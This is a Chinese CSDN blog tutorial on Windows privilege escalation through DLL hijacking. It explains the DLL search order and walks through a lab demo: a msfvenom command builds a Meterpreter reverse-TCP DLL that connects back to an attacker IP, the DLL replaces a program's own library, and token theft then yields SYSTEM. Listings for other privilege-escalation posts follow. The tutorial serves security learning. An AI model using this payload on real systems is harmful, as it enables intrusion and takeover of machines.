【Windows提权】本地提权之dll劫持

最新推荐文章于 2024-05-08 13:29:53 发布
最新推荐文章于 2024-05-08 13:29:53 发布
阅读量2.2k 收藏 9
点赞数 5
分类专栏: 提权 文章标签: dll劫持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/114366001
版权

目录

0x001 原理

Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

Windows查找DLL目录及其顺序如下:

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)

这样的加载顺序很容易导致一个系统dll被劫持,因为只要攻击者将目标文件和恶意dll放在一起即可,导致恶意dll先于系统dll加载,而系统dll是非常常见的,所以当时基于这样的加载顺序,出现了大量受影响软件。

详细文章介绍:https://www.anquanke.com/post/id/225911

0x002 演示

程序运行一般会加载系统dll或本身程序自带的dll,如果我们将程序执行时需要加载的dll文件替换成木马程序,那么我们下次在启动程序时所加载的dll就是我们替换的那个木马程序了。

攻击过程:收集进程加载的dll-制作dll木马并上传-替换dll-启动应用后成功

我们在Windows2008装了一个第三方软件用于测试

1、收集进程加载的dll

使用火绒剑分析该进程执行时加载了哪些dll
在这里插入图片描述
系统文件一般我们是更改不了的,所以一般选择未知文件和数字签名文件。
在这里插入图片描述

2、msf制作dll木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.134  lport=6677 -f dll >./libssl-1_1.dll

在这里插入图片描述

3、替换dll

在这里插入图片描述

4、启动软件

在这里插入图片描述
启动后执行的是我们替换的木马dll,剩下就是使用msf监听端口接收反弹回来的shell就可以了,思路有很多,取决于我们制作的dll用于干什么。
在这里插入图片描述
这里劫持dll配合令牌窃取拿到了system权限

多学点技术
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
系统提权之:Windows 提权
f_carey的博客
11-04 1321
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
系统提权之:Unix 提权
f_carey的博客
08-28 582
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 系统提权之:Unix 提权1 Unix 内核漏洞提权1.1 利用前提1.2 利用 NC 建立 Shell 会话(便于操作)1.2.1 本地配置 NC 监听1.2.2 上传 perl-reverse-shell.pl 反弹 Shell1.3 查询 Unitx 系统内核信息1.4 查找内核版本对应的提权 EXP1..
Windows权限提升—BypassUAC、DLL劫持、引号路径、服务权限等提权
最新发布
2401_84253894的博客
05-08 964
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
windows内网本地用户提权
qq_49714982的博客
04-09 538
1.有当前计算机的web权限,建立在web权限取得的情况下进行的权限提升2.符合的操作系统3.符合的溢出漏洞。
系统提权——Windows系统提权
JulySec的博客
02-13 2027
系统提权——Windows系统提权。 1、使用系统自带命令提权; 2、进程注入; 3、令牌窃取; 4、DLL劫持; 5、不安全的服务配置。 UAC机制的绕过
【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限
xiaoheizi的博客
09-01 2175
1、具体有哪些权限需要我们了解掌握的?后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等2、以上常见权限获取方法简要归类说明?后台权限:SQL注入数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限:SQL注入数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入。
【thm】windows内网提权Windows PrivEsc Arena
人间体佐菲的博客
10-27 1666
【thm】windows内网提权Windows PrivEsc Arena oscp windows提权
一文了解提权:溢出提权和第三方组件提权
闵行小鱼塘
05-04 2112
提权做个归纳,提权一般分为两种——溢出提权和第三方组件提权
juicy-potato Windows提权之访问令牌操纵
weixin_45682070的博客
08-02 1405
0x01 环境攻击机:Kali受害机:Windows 2008R20x02 利用过程一、juicy-potato条件限制:需要支持SeImpersonate或者SeAssignPrimaryToken权限(通常情况下IIS、MSSQL具有这两个权限)开启DCOM本地支持RPC或者远程服务器支持PRC并能成功登录能够找到可用的COM对象获取权限后,使用whoami /priv查看具有的token权限2. 使用Empire生成反弹shell的payload3. 通过冰蝎上传4. 运行c:\temp\JuicyP
渗透测试提权-Windows权限提升
LCW991207的博客
09-12 205
Windows提权之《补丁查询,数据库UDF提权,本地dll文件劫持
提权工具 pr.exe.zip
12-10
1. **本地提权**:利用系统或服务中的安全漏洞,例如缓冲区溢出、权限配置错误等,来提升当前进程的权限。 2. **权限滥用**:通过发现并利用系统中预设但未正确管理的权限,比如滥用服务帐户,或者通过弱权限的服务...
lpk.rar_delphi 提权_提权
09-21
标题中的"lpk.rar_delphi 提权_提权"表明这是一个与Delphi编程语言相关的提权(Privilege Escalation)技术,特别是通过一个名为"lpk.dll"的动态链接库来实现。在Windows系统中,提权是指非管理员用户获取更高的系统...
python禁用键鼠与提权代码实例
09-18
此外,有些操作可能需要更高的权限才能执行,比如修改系统设置或访问受保护的文件,这时就需要进行程序的提权。本篇文章将详细讲解如何使用Python实现这两个功能。 首先,禁用键盘和鼠标输入是通过调用Windows API...
PoCs-win提权.zip
04-08
Windows提权主要分为本地提权和远程提权。本地提权是指攻击者已经获得了系统的一部分访问权限,但希望通过利用漏洞获取更高的权限。远程提权则是在未授权的情况下,通过网络连接获取目标系统的管理员权限。在本文中...
MYSQL提权UDF.dll
06-11
MySQL提权UDF.dll是关于数据库安全领域的一个关键知识点,主要涉及到MySQL服务器的权限提升漏洞利用。UDF(User Defined Function)是MySQL提供的一种机制,允许用户自定义函数以扩展其功能。然而,不当的UDF管理或...
Windows提权】不带引号的服务路径提权
ssrf
10-14 2109
文章目录一、漏洞原理二、编译一个可执行程序三、漏洞复现 一、漏洞原理 当系统管理员配置Windows服务时,他们必须指定要执行的命令,或者运行可执行文件的路径。 当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。 路径没有包含在引号中,服务会按照以下顺序依次执行 c:\program.exe c:\program files.exe
Windows提权】进程注入提权
ssrf
03-04 1428
介绍 获取当前操作系统进程中所拥有的权限 注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。 攻击过程 使用工具列出当前操作系统的所有进程 pinjector.exe -l 可以看到不同的进程对应不同PID和用户。 执行pinjector.exe -p 600 cmd 2345注入进程pid为600的进程,使用端口23
Windows提权】本地提权AT&SC&PS
ssrf
02-27 1198
目录0x001 at命令提权0x002 sc命令提权0x003 ps命令提权 0x001 at命令提权 at 命令提权的原理:at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用的是system权限。 适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除 当我们拿到一个低权限的用户,通过3389端口远程连接上后,可以通过at命令来进行本地提权。 at 12:31 /interactive cmd (在19:39分生成一个交互式的System
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值